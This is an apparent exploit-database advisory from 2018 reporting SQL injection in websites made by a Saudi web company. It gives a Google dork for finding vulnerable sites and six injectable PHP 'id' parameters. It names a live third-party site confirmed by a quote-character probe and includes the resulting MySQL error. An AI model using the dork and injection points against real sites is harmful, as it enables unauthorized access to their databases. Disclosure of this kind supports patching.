#################################################################################################
# Exploit Title : Copyright © 2013 - 2018 Shumool.Com.Sa Real Estate Company Arabia SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos
# Date : 29/05/2018
# Vendor Homepage : shumool.com.sa
# Tested On : Windows
# Exploit Risk : Medium
# CWE: CWE-89
#################################################################################################
# Google Dork 1 : intext:''Copyright © 2013 - 2018 Shumool Company, All Rights Reserved''
# Exploit : /IACD_S.php?id=[SQL Injection]
# Exploit : /AFRAD_S.php?id=[SQL Injection]
# Exploit : /DERMATOLOGY_S.php?id=[SQL Injection]
# Exploit : /COSMETICS_S.php?id=[SQL Injection]
# Exploit : /CONGRESS_S.php?id=[SQL Injection]
# Exploit : /aboutus.php?id=[SQL Injection]
#################################################################################################
# Example Site => cairoderma.com/aboutus.php?id=13%27 [ Proof of Concept for SQL Injection ] => archive.is/djWSX
# SQL/DB Error : Mysql say You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''13'' order by id ASC limit 1' at line 1
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################